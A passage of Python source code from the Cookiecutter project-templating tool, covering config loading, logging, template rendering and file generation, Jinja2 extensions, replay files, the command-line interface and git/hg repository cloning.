ConfigDoesNotExistException(msg) logger.debug('config_path is %s', config_path) with open(config_path, encoding='utf-8') as file_handle: try: yaml_dict = yaml.safe_load(file_handle) or {} except yaml.YAMLError as e: msg = f'Unable to parse YAML file {config_path}.' raise InvalidConfiguration(msg) from e if not isinstance(yaml_dict, dict): msg = f'Top-level element of YAML file {config_path} should be an object.' raise InvalidConfiguration(msg) config_dict = merge_configs(DEFAULT_CONFIG, yaml_dict) raw_replay_dir = config_dict['replay_dir'] config_dict['replay_dir'] = _expand_path(raw_replay_dir) raw_cookies_dir = config_dict['cookiecutters_dir'] config_dict['cookiecutters_dir'] = _expand_path(raw_cookies_dir) return config_dict def get_user_config( config_file: str | None = None, default_config: bool | dict[str, Any] = False, ) -> dict[str, Any]: """Return the user config as a dict. If ``default_config`` is True, ignore ``config_file`` and return default values for the config parameters. If ``default_config`` is a dict, merge values with default values and return them for the config parameters. If a path to a ``config_file`` is given, that is different from the default location, load the user config from that. Otherwise look up the config file path in the ``COOKIECUTTER_CONFIG`` environment variable. If set, load the config from this path. This will raise an error if the specified path is not valid. If the environment variable is not set, try the default config file path before falling back to the default config values. """ # Do NOT load a config. Merge provided values with defaults and return them instead if default_config and isinstance(default_config, dict): return merge_configs(DEFAULT_CONFIG, default_config) # Do NOT load a config. Return defaults instead. if default_config: logger.debug("Force ignoring user config with default_config switch.") return copy.copy(DEFAULT_CONFIG) # Load the given config file if config_file and config_file is not USER_CONFIG_PATH: logger.debug("Loading custom config from %s.", config_file) return get_config(config_file) try: # Does the user set up a config environment variable? env_config_file = os.environ['COOKIECUTTER_CONFIG'] except KeyError: # Load an optional user config if it exists # otherwise return the defaults if os.path.exists(USER_CONFIG_PATH): logger.debug("Loading config from %s.", USER_CONFIG_PATH) return get_config(USER_CONFIG_PATH) logger.debug("User config not found. Loading default config.") return copy.copy(DEFAULT_CONFIG) else: # There is a config environment variable. Try to load it. # Do not check for existence, so invalid file paths raise an error. logger.debug("User config not found or not specified. Loading default config.") return get_config(env_config_file) File: cookiecutter/log.py """Module for setting up logging.""" from __future__ import annotations import logging import sys LOG_LEVELS = { 'DEBUG': logging.DEBUG, 'INFO': logging.INFO, 'WARNING': logging.WARNING, 'ERROR': logging.ERROR, 'CRITICAL': logging.CRITICAL, } LOG_FORMATS = { 'DEBUG': '%(levelname)s %(name)s: %(message)s', 'INFO': '%(levelname)s: %(message)s', } def configure_logger( stream_level: str = 'DEBUG', debug_file: str | None = None ) -> logging.Logger: """Configure logging for cookiecutter. Set up logging to stdout with given level. If ``debug_file`` is given set up logging to file with DEBUG level. """ # Set up 'cookiecutter' logger logger = logging.getLogger('cookiecutter') logger.setLevel(logging.DEBUG) # Remove all attached handlers, in case there was # a logger with using the name 'cookiecutter' del logger.handlers[:] # Create a file handler if a log file is provided if debug_file is not None: debug_formatter = logging.Formatter(LOG_FORMATS['DEBUG']) file_handler = logging.FileHandler(debug_file) file_handler.setLevel(LOG_LEVELS['DEBUG']) file_handler.setFormatter(debug_formatter) logger.addHandler(file_handler) # Get settings based on the given stream_level log_formatter = logging.Formatter(LOG_FORMATS[stream_level]) log_level = LOG_LEVELS[stream_level] # Create a stream handler stream_handler = logging.StreamHandler(stream=sys.stdout) stream_handler.setLevel(log_level) stream_handler.setFormatter(log_formatter) logger.addHandler(stream_handler) return logger File: cookiecutter/generate.py """Functions for generating a project from a project template.""" from __future__ import annotations import fnmatch import json import logging import os import shutil import warnings from collections import OrderedDict from pathlib import Path from typing import Any from binaryornot.check import is_binary from jinja2 import Environment, FileSystemLoader from jinja2.exceptions import TemplateSyntaxError, UndefinedError from rich.prompt import InvalidResponse from cookiecutter.exceptions import ( ContextDecodingException, EmptyDirNameException, OutputDirExistsException, UndefinedVariableInTemplate, ) from cookiecutter.find import find_template from cookiecutter.hooks import run_hook_from_repo_dir from cookiecutter.prompt import YesNoPrompt from cookiecutter.utils import ( create_env_with_context, make_sure_path_exists, rmtree, work_in, ) logger = logging.getLogger(__name__) def is_copy_only_path(path: str, context: dict[str, Any]) -> bool: """Check whether the given `path` should only be copied and not rendered. Returns True if `path` matches a pattern in the given `context` dict, otherwise False. :param path: A file-system path referring to a file or dir that should be rendered or just copied. :param context: cookiecutter context. """ try: for dont_render in context['cookiecutter']['_copy_without_render']: if fnmatch.fnmatch(path, dont_render): return True except KeyError: return False return False def apply_overwrites_to_context( context: dict[str, Any], overwrite_context: dict[str, Any], *, in_dictionary_variable: bool = False, ) -> None: """Modify the given context in place based on the overwrite_context.""" for variable, overwrite in overwrite_context.items(): if variable not in context: if not in_dictionary_variable: # We are dealing with a new variable on first level, ignore continue # We are dealing with a new dictionary variable in a deeper level context[variable] = overwrite context_value = context[variable] if isinstance(context_value, list): if in_dictionary_variable: context[variable] = overwrite continue if isinstance(overwrite, list): # We are dealing with a multichoice variable # Let's confirm all choices are valid for the given context if set(overwrite).issubset(set(context_value)): context[variable] = overwrite else: msg = ( f"{overwrite} provided for multi-choice variable " f"{variable}, but valid choices are {context_value}" ) raise ValueError(msg) else: # We are dealing with a choice variable if overwrite in context_value: # This overwrite is actually valid for the given context # Let's set it as default (by definition first item in list) # see ``cookiecutter.prompt.prompt_choice_for_config`` context_value.remove(overwrite) context_value.insert(0, overwrite) else: msg = ( f"{overwrite} provided for choice variable " f"{variable}, but the choices are {context_value}." ) raise ValueError(msg) elif isinstance(context_value, dict) and isinstance(overwrite, dict): # Partially overwrite some keys in original dict apply_overwrites_to_context( context_value, overwrite, in_dictionary_variable=True ) context[variable] = context_value elif isinstance(context_value, bool) and isinstance(overwrite, str): # We are dealing with a boolean variable # Convert overwrite to its boolean counterpart try: context[variable] = YesNoPrompt().process_response(overwrite) except InvalidResponse as err: msg = ( f"{overwrite} provided for variable " f"{variable} could not be converted to a boolean." ) raise ValueError(msg) from err else: # Simply overwrite the value for this variable context[variable] = overwrite def generate_context( context_file: str = 'cookiecutter.json', default_context: dict[str, Any] | None = None, extra_context: dict[str, Any] | None = None, ) -> dict[str, Any]: """Generate the context for a Cookiecutter project template. Loads the JSON file as a Python object, with key being the JSON filename. :param context_file: JSON file containing key/value pairs for populating the cookiecutter's variables. :param default_context: Dictionary containing config to take into account. :param extra_context: Dictionary containing configuration overrides """ context = OrderedDict([]) try: with open(context_file, encoding='utf-8') as file_handle: obj = json.load(file_handle, object_pairs_hook=OrderedDict) except ValueError as e: # JSON decoding error. Let's throw a new exception that is more # friendly for the developer or user. full_fpath = os.path.abspath(context_file) json_exc_message = str(e) our_exc_message = ( f"JSON decoding error while loading '{full_fpath}'. " f"Decoding error details: '{json_exc_message}'" ) raise ContextDecodingException(our_exc_message) from e # Add the Python object to the context dictionary file_name = os.path.split(context_file)[1] file_stem = file_name.split('.')[0] context[file_stem] = obj # Overwrite context variable defaults with the default context from the # user's global config, if available if default_context: try: apply_overwrites_to_context(obj, default_context) except ValueError as error: warnings.warn(f"Invalid default received: {error}") if extra_context: apply_overwrites_to_context(obj, extra_context) logger.debug('Context generated is %s', context) return context def generate_file( project_dir: str, infile: str, context: dict[str, Any], env: Environment, skip_if_file_exists: bool = False, ) -> None: """Render filename of infile as name of outfile, handle infile correctly. Dealing with infile appropriately: a. If infile is a binary file, copy it over without rendering. b. If infile is a text file, render its contents and write the rendered infile to outfile. Precondition: When calling `generate_file()`, the root template dir must be the current working directory. Using `utils.work_in()` is the recommended way to perform this directory change. :param project_dir: Absolute path to the resulting generated project. :param infile: Input file to generate the file from. Relative to the root template dir. :param context: Dict for populating the cookiecutter's variables. :param env: Jinja2 template execution environment. """ logger.debug('Processing file %s', infile) # Render the path to the output file (not including the root project dir) outfile_tmpl = env.from_string(infile) outfile = os.path.join(project_dir, outfile_tmpl.render(**context)) file_name_is_empty = os.path.isdir(outfile) if file_name_is_empty: logger.debug('The resulting file name is empty: %s', outfile) return if skip_if_file_exists and os.path.exists(outfile): logger.debug('The resulting file already exists: %s', outfile) return logger.debug('Created file at %s', outfile) # Just copy over binary files. Don't render. logger.debug("Check %s to see if it's a binary", infile) if is_binary(infile): logger.debug('Copying binary %s to %s without rendering', infile, outfile) shutil.copyfile(infile, outfile) shutil.copymode(infile, outfile) return # Force fwd slashes on Windows for get_template # This is a by-design Jinja issue infile_fwd_slashes = infile.replace(os.path.sep, '/') # Render the file try: tmpl = env.get_template(infile_fwd_slashes) except TemplateSyntaxError as exception: # Disable translated so that printed exception contains verbose # information about syntax error location exception.translated = False raise rendered_file = tmpl.render(**context) if context['cookiecutter'].get('_new_lines', False): # Use `_new_lines` from context, if configured. newline = context['cookiecutter']['_new_lines'] logger.debug('Using configured newline character %s', repr(newline)) else: # Detect original file newline to output the rendered file. # Note that newlines can be a tuple if file contains mixed line endings. # In this case, we pick the first line ending we detected. with open(infile, encoding='utf-8') as rd: rd.readline() # Read only the first line to load a 'newlines' value. newline = rd.newlines[0] if isinstance(rd.newlines, tuple) else rd.newlines logger.debug('Using detected newline character %s', repr(newline)) logger.debug('Writing contents to file %s', outfile) with open(outfile, 'w', encoding='utf-8', newline=newline) as fh: # noqa: FURB103 (false positive for python < 3.10) fh.write(rendered_file) # Apply file permissions to output file shutil.copymode(infile, outfile) def render_and_create_dir( dirname: str, context: dict[str, Any], output_dir: Path | str, environment: Environment, overwrite_if_exists: bool = False, ) -> tuple[Path, bool]: """Render name of a directory, create the directory, return its path.""" if not dirname or dirname == "": msg = 'Error: directory name is empty' raise EmptyDirNameException(msg) name_tmpl = environment.from_string(dirname) rendered_dirname = name_tmpl.render(**context) dir_to_create = Path(output_dir, rendered_dirname) logger.debug( 'Rendered dir %s must exist in output_dir %s', dir_to_create, output_dir ) output_dir_exists = dir_to_create.exists() if output_dir_exists: if overwrite_if_exists: logger.debug( 'Output directory %s already exists, overwriting it', dir_to_create ) else: msg = f'Error: "{dir_to_create}" directory already exists' raise OutputDirExistsException(msg) else: make_sure_path_exists(dir_to_create) return dir_to_create, not output_dir_exists def _run_hook_from_repo_dir( repo_dir: str, hook_name: str, project_dir: Path | str, context: dict[str, Any], delete_project_on_failure: bool, ) -> None: """Run hook from repo directory, clean project directory if hook fails. :param repo_dir: Project template input directory. :param hook_name: The hook to execute. :param project_dir: The directory to execute the script from. :param context: Cookiecutter project context. :param delete_project_on_failure: Delete the project directory on hook failure? """ warnings.warn( "The '_run_hook_from_repo_dir' function is deprecated, " "use 'cookiecutter.hooks.run_hook_from_repo_dir' instead", DeprecationWarning, 2, ) run_hook_from_repo_dir( repo_dir, hook_name, project_dir, context, delete_project_on_failure ) def generate_files( repo_dir: Path | str, context: dict[str, Any] | None = None, output_dir: Path | str = '.', overwrite_if_exists: bool = False, skip_if_file_exists: bool = False, accept_hooks: bool = True, keep_project_on_failure: bool = False, ) -> str: """Render the templates and saves them to files. :param repo_dir: Project template input directory. :param context: Dict for populating the template's variables. :param output_dir: Where to output the generated project dir into. :param overwrite_if_exists: Overwrite the contents of the output directory if it exists. :param skip_if_file_exists: Skip the files in the corresponding directories if they already exist :param accept_hooks: Accept pre and post hooks if set to `True`. :param keep_project_on_failure: If `True` keep generated project directory even when generation fails """ context = context or OrderedDict([]) env = create_env_with_context(context) template_dir = find_template(repo_dir, env) logger.debug('Generating project from %s...', template_dir) unrendered_dir = os.path.split(template_dir)[1] try: project_dir: Path | str project_dir, output_directory_created = render_and_create_dir( unrendered_dir, context, output_dir, env, overwrite_if_exists ) except UndefinedError as err: msg = f"Unable to create project directory '{unrendered_dir}'" raise UndefinedVariableInTemplate(msg, err, context) from err # We want the Jinja path and the OS paths to match. Consequently, we'll: # + CD to the template folder # + Set Jinja's path to '.' # # In order to build our files to the correct folder(s), we'll use an # absolute path for the target folder (project_dir) project_dir = os.path.abspath(project_dir) logger.debug('Project directory is %s', project_dir) # if we created the output directory, then it's ok to remove it # if rendering fails delete_project_on_failure = output_directory_created and not keep_project_on_failure if accept_hooks: run_hook_from_repo_dir( repo_dir, 'pre_gen_project', project_dir, context, delete_project_on_failure ) with work_in(template_dir): env.loader = FileSystemLoader(['.', '../templates']) for root, dirs, files in os.walk('.'): # We must separate the two types of dirs into different lists. # The reason is that we don't want ``os.walk`` to go through the # unrendered directories, since they will just be copied. copy_dirs = [] render_dirs = [] for d in dirs: d_ = os.path.normpath(os.path.join(root, d)) # We check the full path, because that's how it can be # specified in the ``_copy_without_render`` setting, but # we store just the dir name if is_copy_only_path(d_, context): logger.debug('Found copy only path %s', d) copy_dirs.append(d) else: render_dirs.append(d) for copy_dir in copy_dirs: indir = os.path.normpath(os.path.join(root, copy_dir)) outdir = os.path.normpath(os.path.join(project_dir, indir)) outdir = env.from_string(outdir).render(**context) logger.debug('Copying dir %s to %s without rendering', indir, outdir) # The outdir is not the root dir, it is the dir which marked as copy # only in the config file. If the program hits this line, which means # the overwrite_if_exists = True, and root dir exists if os.path.isdir(outdir): shutil.rmtree(outdir) shutil.copytree(indir, outdir) # We mutate ``dirs``, because we only want to go through these dirs # recursively dirs[:] = render_dirs for d in dirs: unrendered_dir = os.path.join(project_dir, root, d) try: render_and_create_dir( unrendered_dir, context, output_dir, env, overwrite_if_exists ) except UndefinedError as err: if delete_project_on_failure: rmtree(project_dir) _dir = os.path.relpath(unrendered_dir, output_dir) msg = f"Unable to create directory '{_dir}'" raise UndefinedVariableInTemplate(msg, err, context) from err for f in files: infile = os.path.normpath(os.path.join(root, f)) if is_copy_only_path(infile, context): outfile_tmpl = env.from_string(infile) outfile_rendered = outfile_tmpl.render(**context) outfile = os.path.join(project_dir, outfile_rendered) logger.debug( 'Copying file %s to %s without rendering', infile, outfile ) shutil.copyfile(infile, outfile) shutil.copymode(infile, outfile) continue try: generate_file( project_dir, infile, context, env, skip_if_file_exists ) except UndefinedError as err: if delete_project_on_failure: rmtree(project_dir) msg = f"Unable to create file '{infile}'" raise UndefinedVariableInTemplate(msg, err, context) from err if accept_hooks: run_hook_from_repo_dir( repo_dir, 'post_gen_project', project_dir, context, delete_project_on_failure, ) return project_dir File: cookiecutter/__init__.py """Main package for Cookiecutter.""" from pathlib import Path def _get_version() -> str: """Read VERSION.txt and return its contents.""" path = Path(__file__).parent.resolve() version_file = path / "VERSION.txt" return version_file.read_text(encoding="utf-8").strip() __version__ = _get_version() File: cookiecutter/extensions.py """Jinja2 extensions.""" from __future__ import annotations import json import string import uuid from secrets import choice from typing import TYPE_CHECKING, Any, Iterable import arrow from jinja2 import Environment, nodes from jinja2.ext import Extension from slugify import slugify as pyslugify from slugify.slugify import DEFAULT_SEPARATOR if TYPE_CHECKING: import re from jinja2.parser import Parser class JsonifyExtension(Extension): """Jinja2 extension to convert a Python object to JSON.""" def __init__(self, environment: Environment) -> None: """Initialize the extension with the given environment.""" super().__init__(environment) def jsonify(obj: Any, indent: int = 4) -> str: return json.dumps(obj, sort_keys=True, indent=indent) environment.filters['jsonify'] = jsonify class RandomStringExtension(Extension): """Jinja2 extension to create a random string.""" def __init__(self, environment: Environment) -> None: """Jinja2 Extension Constructor.""" super().__init__(environment) def random_ascii_string(length: int, punctuation: bool = False) -> str: if punctuation: corpus = f'{string.ascii_letters}{string.punctuation}' else: corpus = string.ascii_letters return "".join(choice(corpus) for _ in range(length)) environment.globals.update(random_ascii_string=random_ascii_string) class SlugifyExtension(Extension): """Jinja2 Extension to slugify string.""" def __init__(self, environment: Environment) -> None: """Jinja2 Extension constructor.""" super().__init__(environment) def slugify( value: str, entities: bool = True, decimal: bool = True, hexadecimal: bool = True, max_length: int = 0, word_boundary: bool = False, separator: str = DEFAULT_SEPARATOR, save_order: bool = False, stopwords: Iterable[str] = (), regex_pattern: re.Pattern[str] | str | None = None, lowercase: bool = True, replacements: Iterable[Iterable[str]] = (), allow_unicode: bool = False, ) -> str: """Slugifies the value.""" return pyslugify( value, entities, decimal, hexadecimal, max_length, word_boundary, separator, save_order, stopwords, regex_pattern, lowercase, replacements, allow_unicode, ) environment.filters['slugify'] = slugify class UUIDExtension(Extension): """Jinja2 Extension to generate uuid4 string.""" def __init__(self, environment: Environment) -> None: """Jinja2 Extension constructor.""" super().__init__(environment) def uuid4() -> str: """Generate UUID4.""" return str(uuid.uuid4()) environment.globals.update(uuid4=uuid4) class TimeExtension(Extension): """Jinja2 Extension for dates and times.""" tags = {'now'} def __init__(self, environment: Environment) -> None: """Jinja2 Extension constructor.""" super().__init__(environment) environment.extend(datetime_format='%Y-%m-%d') def _datetime( self, timezone: str, operator: str, offset: str, datetime_format: str | None, ) -> str: d = arrow.now(timezone) # parse shift params from offset and include operator shift_params = {} for param in offset.split(','): interval, value = param.split('=') shift_params[interval.strip()] = float(operator + value.strip()) d = d.shift(**shift_params) if datetime_format is None: datetime_format = self.environment.datetime_format # type: ignore[attr-defined] return d.strftime(datetime_format) def _now(self, timezone: str, datetime_format: str | None) -> str: if datetime_format is None: datetime_format = self.environment.datetime_format # type: ignore[attr-defined] return arrow.now(timezone).strftime(datetime_format) def parse(self, parser: Parser) -> nodes.Output: """Parse datetime template and add datetime value.""" lineno = next(parser.stream).lineno node = parser.parse_expression() if parser.stream.skip_if('comma'): datetime_format = parser.parse_expression() else: datetime_format = nodes.Const(None) if isinstance(node, nodes.Add): call_method = self.call_method( '_datetime', [node.left, nodes.Const('+'), node.right, datetime_format], lineno=lineno, ) elif isinstance(node, nodes.Sub): call_method = self.call_method( '_datetime', [node.left, nodes.Const('-'), node.right, datetime_format], lineno=lineno, ) else: call_method = self.call_method( '_now', [node, datetime_format], lineno=lineno, ) return nodes.Output([call_method], lineno=lineno) File: cookiecutter/replay.py """ cookiecutter.replay. ------------------- """ from __future__ import annotations import json import os from typing import TYPE_CHECKING, Any from cookiecutter.utils import make_sure_path_exists if TYPE_CHECKING: from pathlib import Path def get_file_name(replay_dir: Path | str, template_name: str) -> str: """Get the name of file.""" suffix = '.json' if not template_name.endswith('.json') else '' file_name = f'{template_name}{suffix}' return os.path.join(replay_dir, file_name) def dump(replay_dir: Path | str, template_name: str, context: dict[str, Any]) -> None: """Write json data to file.""" make_sure_path_exists(replay_dir) if 'cookiecutter' not in context: msg = 'Context is required to contain a cookiecutter key' raise ValueError(msg) replay_file = get_file_name(replay_dir, template_name) with open(replay_file, 'w', encoding="utf-8") as outfile: json.dump(context, outfile, indent=2) def load(replay_dir: Path | str, template_name: str) -> dict[str, Any]: """Read json data from file.""" replay_file = get_file_name(replay_dir, template_name) with open(replay_file, encoding="utf-8") as infile: context: dict[str, Any] = json.load(infile) if 'cookiecutter' not in context: msg = 'Context is required to contain a cookiecutter key' raise ValueError(msg) return context File: cookiecutter/cli.py """Main `cookiecutter` CLI.""" from __future__ import annotations import json import os import sys from collections import OrderedDict from typing import TYPE_CHECKING, Any if TYPE_CHECKING: from collections.abc import Iterable from click import Context, Parameter from typing_extensions import Literal import click from cookiecutter import __version__ from cookiecutter.config import get_user_config from cookiecutter.exceptions import ( ContextDecodingException, EmptyDirNameException, FailedHookException, InvalidModeException, InvalidZipRepository, OutputDirExistsException, RepositoryCloneFailed, RepositoryNotFound, UndefinedVariableInTemplate, UnknownExtension, ) from cookiecutter.log import configure_logger from cookiecutter.main import cookiecutter def version_msg() -> str: """Return the Cookiecutter version, location and Python powering it.""" python_version = sys.version location = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) return f"Cookiecutter {__version__} from {location} (Python {python_version})" def validate_extra_context( _ctx: Context, _param: Parameter, value: Iterable[str] ) -> OrderedDict[str, str] | None: """Validate extra context.""" for string in value: if '=' not in string: msg = ( f"EXTRA_CONTEXT should contain items of the form key=value; " f"'{string}' doesn't match that form" ) raise click.BadParameter(msg) # Convert tuple -- e.g.: ('program_name=foobar', 'startsecs=66') # to dict -- e.g.: {'program_name': 'foobar', 'startsecs': '66'} return OrderedDict(s.split('=', 1) for s in value) or None def list_installed_templates( default_config: bool | dict[str, Any], passed_config_file: str | None ) -> None: """List installed (locally cloned) templates. Use cookiecutter --list-installed.""" config = get_user_config(passed_config_file, default_config) cookiecutter_folder: str = config['cookiecutters_dir'] if not os.path.exists(cookiecutter_folder): click.echo( f"Error: Cannot list installed templates. " f"Folder does not exist: {cookiecutter_folder}" ) sys.exit(-1) template_names = [ folder for folder in os.listdir(cookiecutter_folder) if os.path.exists( os.path.join(cookiecutter_folder, folder, 'cookiecutter.json') ) ] click.echo(f'{len(template_names)} installed templates: ') for name in template_names: click.echo(f' * {name}') @click.command(context_settings={"help_option_names": ['-h', '--help']}) @click.version_option(__version__, '-V', '--version', message=version_msg()) @click.argument('template', required=False) @click.argument('extra_context', nargs=-1, callback=validate_extra_context) @click.option( '--no-input', is_flag=True, help='Do not prompt for parameters and only use cookiecutter.json file content. ' 'Defaults to deleting any cached resources and redownloading them. ' 'Cannot be combined with the --replay flag.', ) @click.option( '-c', '--checkout', help='branch, tag or commit to checkout after git clone', ) @click.option( '--directory', help='Directory within repo that holds cookiecutter.json file ' 'for advanced repositories with multi templates in it', ) @click.option( '-v', '--verbose', is_flag=True, help='Print debug information', default=False ) @click.option( '--replay', is_flag=True, help='Do not prompt for parameters and only use information entered previously. ' 'Cannot be combined with the --no-input flag or with extra configuration passed.', ) @click.option( '--replay-file', type=click.Path(), default=None, help='Use this file for replay instead of the default.', ) @click.option( '-f', '--overwrite-if-exists', is_flag=True, help='Overwrite the contents of the output directory if it already exists', ) @click.option( '-s', '--skip-if-file-exists', is_flag=True, help='Skip the files in the corresponding directories if they already exist', default=False, ) @click.option( '-o', '--output-dir', default='.', type=click.Path(), help='Where to output the generated project dir into', ) @click.option( '--config-file', type=click.Path(), default=None, help='User configuration file' ) @click.option( '--default-config', is_flag=True, help='Do not load a config file. Use the defaults instead', ) @click.option( '--debug-file', type=click.Path(), default=None, help='File to be used as a stream for DEBUG logging', ) @click.option( '--accept-hooks', type=click.Choice(['yes', 'ask', 'no']), default='yes', help='Accept pre/post hooks', ) @click.option( '-l', '--list-installed', is_flag=True, help='List currently installed templates.' ) @click.option( '--keep-project-on-failure', is_flag=True, help='Do not delete project folder on failure', ) def main( template: str, extra_context: dict[str, Any], no_input: bool, checkout: str, verbose: bool, replay: bool | str, overwrite_if_exists: bool, output_dir: str, config_file: str | None, default_config: bool, debug_file: str | None, directory: str, skip_if_file_exists: bool, accept_hooks: Literal['yes', 'ask', 'no'], replay_file: str | None, list_installed: bool, keep_project_on_failure: bool, ) -> None: """Create a project from a Cookiecutter project template (TEMPLATE). Cookiecutter is free and open source software, developed and managed by volunteers. If you would like to help out or fund the project, please get in touch at https://github.com/cookiecutter/cookiecutter. """ # Commands that should work without arguments if list_installed: list_installed_templates(default_config, config_file) sys.exit(0) # Raising usage, after all commands that should work without args. if not template or template.lower() == 'help': click.echo(click.get_current_context().get_help()) sys.exit(0) configure_logger(stream_level='DEBUG' if verbose else 'INFO', debug_file=debug_file) # If needed, prompt the user to ask whether or not they want to execute # the pre/post hooks. if accept_hooks == "ask": _accept_hooks = click.confirm("Do you want to execute hooks?") else: _accept_hooks = accept_hooks == "yes" if replay_file: replay = replay_file try: cookiecutter( template, checkout, no_input, extra_context=extra_context, replay=replay, overwrite_if_exists=overwrite_if_exists, output_dir=output_dir, config_file=config_file, default_config=default_config, password=os.environ.get('COOKIECUTTER_REPO_PASSWORD'), directory=directory, skip_if_file_exists=skip_if_file_exists, accept_hooks=_accept_hooks, keep_project_on_failure=keep_project_on_failure, ) except ( ContextDecodingException, OutputDirExistsException, EmptyDirNameException, InvalidModeException, FailedHookException, UnknownExtension, InvalidZipRepository, RepositoryNotFound, RepositoryCloneFailed, ) as e: click.echo(e) sys.exit(1) except UndefinedVariableInTemplate as undefined_err: click.echo(f'{undefined_err.message}') click.echo(f'Error message: {undefined_err.error.message}') context_str = json.dumps(undefined_err.context, indent=4, sort_keys=True) click.echo(f'Context: {context_str}') sys.exit(1) if __name__ == "__main__": main() File: cookiecutter/utils.py """Helper functions used throughout Cookiecutter.""" from __future__ import annotations import contextlib import logging import os import shutil import stat import tempfile from pathlib import Path from typing import TYPE_CHECKING, Any, Iterator from jinja2.ext import Extension from cookiecutter.environment import StrictEnvironment if TYPE_CHECKING: from jinja2 import Environment logger = logging.getLogger(__name__) def force_delete(func, path, _exc_info) -> None: # type: ignore[no-untyped-def] """Error handler for `shutil.rmtree()` equivalent to `rm -rf`. Usage: `shutil.rmtree(path, onerror=force_delete)` From https://docs.python.org/3/library/shutil.html#rmtree-example """ os.chmod(path, stat.S_IWRITE) func(path) def rmtree(path: Path | str) -> None: """Remove a directory and all its contents. Like rm -rf on Unix. :param path: A directory path. """ shutil.rmtree(path, onerror=force_delete) def make_sure_path_exists(path: Path | str) -> None: """Ensure that a directory exists. :param path: A directory tree path for creation. """ logger.debug('Making sure path exists (creates tree if not exist): %s', path) try: Path(path).mkdir(parents=True, exist_ok=True) except OSError as error: msg = f'Unable to create directory at {path}' raise OSError(msg) from error @contextlib.contextmanager def work_in(dirname: Path | str | None = None) -> Iterator[None]: """Context manager version of os.chdir. When exited, returns to the working directory prior to entering. """ curdir = os.getcwd() try: if dirname is not None: os.chdir(dirname) yield finally: os.chdir(curdir) def make_executable(script_path: Path | str) -> None: """Make `script_path` executable. :param script_path: The file to change """ status = os.stat(script_path) os.chmod(script_path, status.st_mode | stat.S_IEXEC) def simple_filter(filter_function) -> type[Extension]: # type: ignore[no-untyped-def] """Decorate a function to wrap it in a simplified jinja2 extension.""" class SimpleFilterExtension(Extension): def __init__(self, environment: Environment) -> None: super().__init__(environment) environment.filters[filter_function.__name__] = filter_function SimpleFilterExtension.__name__ = filter_function.__name__ return SimpleFilterExtension def create_tmp_repo_dir(repo_dir: Path | str) -> Path: """Create a temporary dir with a copy of the contents of repo_dir.""" repo_dir = Path(repo_dir).resolve() base_dir = tempfile.mkdtemp(prefix='cookiecutter') new_dir = f"{base_dir}/{repo_dir.name}" logger.debug(f'Copying repo_dir from {repo_dir} to {new_dir}') shutil.copytree(repo_dir, new_dir) return Path(new_dir) def create_env_with_context(context: dict[str, Any]) -> StrictEnvironment: """Create a jinja environment using the provided context.""" envvars = context.get('cookiecutter', {}).get('_jinja2_env_vars', {}) return StrictEnvironment(context=context, keep_trailing_newline=True, **envvars) File: cookiecutter/vcs.py """Helper functions for working with version control systems.""" from __future__ import annotations import logging import os import subprocess from pathlib import Path from shutil import which from typing import TYPE_CHECKING if TYPE_CHECKING: from typing_extensions import Literal from cookiecutter.exceptions import ( RepositoryCloneFailed, RepositoryNotFound, UnknownRepoType, VCSNotInstalled, ) from cookiecutter.prompt import prompt_and_delete from cookiecutter.utils import make_sure_path_exists logger = logging.getLogger(__name__) BRANCH_ERRORS = [ 'error: pathspec', 'unknown revision', ] def identify_repo(repo_url: str) -> tuple[Literal["git", "hg"], str]: """Determine if `repo_url` should be treated as a URL to a git or hg repo. Repos can be identified by prepending "hg+" or "git+" to the repo URL. :param repo_url: Repo URL of unknown type. :returns: ('git', repo_url), ('hg', repo_url), or None. """ repo_url_values = repo_url.split('+') if len(repo_url_values) == 2: repo_type = repo_url_values[0] if repo_type in ["git", "hg"]: return repo_type, repo_url_values[1] # type: ignore[return-value] raise UnknownRepoType if 'git' in repo_url: return 'git', repo_url if 'bitbucket' in repo_url: return 'hg', repo_url raise UnknownRepoType def is_vcs_installed(repo_type: str) -> bool: """ Check if the version control system for a repo type is installed. :param repo_type: """ return bool(which(repo_type)) def clone( repo_url: str, checkout: str | None = None, clone_to_dir: Path | str = ".", no_input: bool = False, ) -> str: """Clone a repo to the current directory. :param repo_url: Repo URL of unknown type. :param checkout: The branch, tag or commit ID to checkout after clone. :param clone_to_dir: The directory to clone to. Defaults to the current directory. :param no_input: Do not prompt for user input and eventually force a refresh of cached resources. :returns: str with path to the new directory of the repository. """ # Ensure that clone_to_dir exists clone_to_dir = Path(clone_to_dir).expanduser() make_sure_path_exists(clone_to_dir) # identify the repo_type repo_type, repo_url = identify_repo(repo_url) # check that the appropriate VCS for the repo_type is installed if not is_vcs_installed(repo_type): msg = f"'{repo_type}' is not installed." raise VCSNotInstalled(msg) repo_url = repo_url.rstrip('/') repo_name = os.path.split(repo_url)[1] if repo_type == 'git': repo_name = repo_name.split(':')[-1].rsplit('.git')[0] repo_dir = os.path.normpath(os.path.join(clone_to_dir, repo_name)) if repo_type == 'hg': repo_dir = os.path.normpath(os.path.join(clone_to_dir, repo_name)) logger.debug(f'repo_dir is {repo_dir}') if os.path.isdir(repo_dir): clone = prompt_and_delete(repo_dir, no_input=no_input) else: clone = True if clone: try: subprocess.check_output( [repo_type, 'clone', repo_url], cwd=clone_to_dir, stderr=subprocess.STDOUT, ) if checkout is not None: checkout_params = [checkout] # Avoid Mercurial "--config" and "--debugger" injection vulnerability if repo_type == "hg": checkout_params.insert(0, "--") subprocess.check_output( [repo_type, 'checkout', *checkout_params], cwd=repo_dir, stderr=subprocess.STDOUT, ) except subprocess.CalledProcessError as clone_error: output = clone_error.output.decode('utf-8') if 'not found' in output.lower(): msg = ( f'The repository {repo_url} could not be found, ' 'have you made a typo?' ) raise RepositoryNotFound(msg) from clone_error if any(error in output for error in BRANCH_ERRORS): msg = ( f'The {checkout} branch of repository ' f'{repo_url} could not found, have you made a typo?' ) raise RepositoryCloneFailed(msg) from clone_error logger.exception('git clone failed with error: %s', output) raise return repo_dir File: cookiecutter/environment.py """Jinja2 environment and extensions loading.""" from __future__ import annotations from typing import Any from jinja2 import Environment, StrictUndefined from cookiecutter.exceptions import UnknownExtension class ExtensionLoaderMixin: """Mixin providing sane loading of extensions specified in a given context. The context is being extracted from the keyword arguments before calling the next parent class in line of the child. """ def __init__(self, *, context: dict[str, Any] | None = None, **kwargs: Any) -> None: """Initialize the Jinja2 Environment object while loading extensions. Does the following: 1. Establishes default_extensions (currently just a Time feature) 2. Reads extensions set in the cookiecutter.json _extensions key. 3. Attempts to load the extensions. Provides useful error if fails. """ context = context or {} default_extensions = [ 